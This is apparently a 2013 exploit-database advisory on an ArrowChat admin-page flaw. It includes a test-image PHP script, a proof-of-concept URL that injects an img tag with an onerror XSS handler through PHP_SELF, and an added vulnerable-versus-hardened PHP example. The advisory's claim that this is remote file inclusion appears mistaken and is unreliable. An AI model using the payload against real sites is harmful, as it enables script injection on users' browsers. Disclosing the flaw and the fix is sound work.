ArrowChat 1.5.61 RFI Vulnerability



EKU-ID: 3039 CVE: OSVDB-ID:
Author: Euforia33 Published: 2013-02-22 Verified: Verified


// RFI Vulnerability in ArrowChat 1.6.1
// RFI PHP Image coded by Euforia33, 21/02/2013.
// Known vulnerable versions (1.6.1 and below) 

In addition to the XSS and LFI vulnerabilities in ArrowChat 1.5.61 pointed out by
Kallimero (http://packetstormsecurity.com/files/119999/ArrowChat-1.5.61-Cross-Site-Scripting-Local-File-Inclusion.html),
you can also include remote PHP files by exploiting the same piece of code:

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php
echo $do; ?>" enctype="multipart/form-data">

By using image headers, it is possible to include remote PHP files directly onto the
page through the IMG tag. The onerror attribute shows a way to inject XSS without
the script tags, which are often filtered out. If you want the XSS instead of the
RFI, simply point the img src to a location that does not exist; the browser then
fires the onerror handler we have chosen, which in this case is the XSS injection.
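The root cause is the form action above: PHP_SELF carries whatever PATH_INFO the client appended and is echoed into an attribute unescaped. The following is an added example, not ArrowChat's code, that puts that pattern beside a hardened version using constructed request values; the function names are hypothetical.

```php
<?php
// Added example (not ArrowChat's code). Runs from the PHP CLI with core functions only.

// Vulnerable pattern: PHP_SELF includes client-supplied PATH_INFO and is
// interpolated into an HTML attribute unescaped, as is $do.
function form_action_vulnerable(string $phpSelf, string $do): string
{
    return '<form method="post" action="' . $phpSelf . '?do=' . $do
         . '" enctype="multipart/form-data">';
}

// Hardened pattern: SCRIPT_NAME never carries PATH_INFO, the attribute value is
// HTML-escaped (quotes included) and the query parameter is URL-encoded, so no
// client input can close the attribute or open a new tag.
function form_action_hardened(string $scriptName, string $do): string
{
    $action = htmlspecialchars($scriptName, ENT_QUOTES | ENT_HTML5, 'UTF-8')
            . '?do=' . rawurlencode($do);
    return '<form method="post" action="' . $action
         . '" enctype="multipart/form-data">';
}

// Constructed request values: the client appended a path segment carrying markup.
$_SERVER['SCRIPT_NAME'] = '/admin/layout/pages_general.php';
$_SERVER['PHP_SELF']    = $_SERVER['SCRIPT_NAME'] . "/'\"/><img src=x onerror=alert(1)>";
$do = 'general';

// The injected <img> tag is emitted verbatim and becomes live markup.
echo form_action_vulnerable($_SERVER['PHP_SELF'], $do), PHP_EOL;

// Output stays inside the quoted attribute; no PATH_INFO, quotes are entities.
echo form_action_hardened($_SERVER['SCRIPT_NAME'], $do), PHP_EOL;

// Even if PHP_SELF were still used, escaping alone keeps the markup inert.
$escapedOnly = form_action_hardened($_SERVER['PHP_SELF'], $do);
if (strpos($escapedOnly, '<img') !== false) {
    throw new RuntimeException('escaping failed');
}
echo $escapedOnly, PHP_EOL;
```

A regression test for the fix can assert that the rendered form contains no `<img` and no raw quote characters for this input.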

Here's a sample image, rendered in PHP for the purpose of checking if RFI is possible:

<?php

# Strings to display in the image; the shuffle makes each render differ,
# which shows the PHP actually executed rather than a cached image being served
$maintxt  = "RFI Vulnerability Test";
$exetest  = "Packet Storm";
$exetest2 = str_shuffle($exetest);

# 350x120 black canvas with grey text
$im  = imagecreatetruecolor(350, 120);
$bg  = imagecolorallocate($im, 0x00, 0x00, 0x00);
$txt = imagecolorallocate($im, 85, 85, 85);
imagefilledrectangle($im, 0, 0, 350, 120, $bg);

# A negative colour index disables GD anti-aliasing; Arial.ttf must sit in the working directory
imagettftext($im, 17, 0, 20, 35, -$txt, 'Arial.ttf', $maintxt);
imagettftext($im, 11, 0, 125, 70, -$txt, 'Arial.ttf', $exetest);
imagettftext($im, 11, 0, 125, 90, -$txt, 'Arial.ttf', $exetest2);

# Send the image header followed by the PNG body
header('Content-type: image/png');
imagepng($im);
imagedestroy($im);

?>

PoC: 
http://[domain.name]/[pathtoArrowChat]/admin/layout/pages_general.php/'"/><img src="http://[remote.domain.name]/Image.php" onerror=alert(33);>

Euforia33.